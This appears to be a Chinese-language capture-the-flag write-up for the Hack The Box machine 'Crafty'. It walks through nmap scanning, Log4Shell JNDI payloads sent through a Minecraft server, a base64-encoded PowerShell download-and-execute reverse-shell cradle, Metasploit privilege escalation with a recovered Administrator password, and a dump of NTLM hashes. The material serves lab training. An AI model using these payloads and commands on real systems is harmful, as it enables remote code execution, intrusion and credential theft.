基本信息

端口扫描

常规扫描只有个80:

1
2
3
4
5
6
7
8
9
10
11
12
13
$ nmap -sC -sV 10.10.11.249
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-12 12:30 CST
Nmap scan report for 10.10.11.249
Host is up (0.091s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://crafty.htb
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.99 seconds

80

需要加hosts:

1
10.10.11.249 crafty.htb

给出另一个域名,看起来是MC server,默认端口确认是minecraft:

1
2
3
4
5
6
7
8
9
10
$ nmap -sC -sV -p25565 10.10.11.249
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-12 12:34 CST
Nmap scan report for crafty.htb (10.10.11.249)
Host is up (0.096s latency).

PORT      STATE SERVICE   VERSION
25565/tcp open  minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.98 seconds

minecraft

不想本地装mc的话可以直接用这个:

play那个域名加不加hosts都可以,密码留空,使用offline mo de:

log4j

这台机器迟到了三年,根据mc版本号和以前的记忆,可以知道存在log4j的:

1
${jndi:ldap://10.10.16.2:4444/test}

log4shell

就是标准的log4shell,打到svc_minecraft:

1
2
3
4
5
6
7
java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 10.10.16.2 -l 1389 -p 8080

# echo "ping 10.10.16.2" | base64
${jndi:ldap://10.10.16.2:1389/Basic/Command/Base64/cGluZyAxMC4xMC4xNi4yCg==}
# powershell -c "(New-Object Net.WebClient).DownloadString('http://10.10.16.2:7777/rev.ps1') | iex" 
# cG93ZXJzaGVsbCAtYyAiKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMC4xMC4xNi4yOjc3NzcvcmV2LnBzMScpIHwgaWV4Ig==
${jndi:ldap://10.10.16.2:1389/Basic/Command/Base64/cG93ZXJzaGVsbCAtYyAiKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMC4xMC4xNi4yOjc3NzcvcmV2LnBzMScpIHwgaWV4Ig==}

user flag

上msf方便后续操作,svc_minecraft桌面得到user flag:

提权信息

Mc server插件目录里有个playercounter,下载下来分析:

很容易看到一个密码:

提权 & root flag

这个密码就是Administrator密码:

1
2
3
4
run post/windows/manage/run_as_psh user=Administrator pass=s67u84zKq8IXw

# 再上个Administrator meterpreter
powershell -c "(New-Object Net.WebClient).DownloadString('http://10.10.16.2:7777/rev.ps1') | iex"

hashdump

1
2
3
4
5
6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:686d56296249595a2bc3d7a8807958ad:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
jacob:1001:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
svc_minecraft:1002:aad3b435b51404eeaad3b435b51404ee:786082f9a8cb7872767bb1a4b7934451:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:7f920fb73571539eb18c0b2f876cfda0:::

参考资料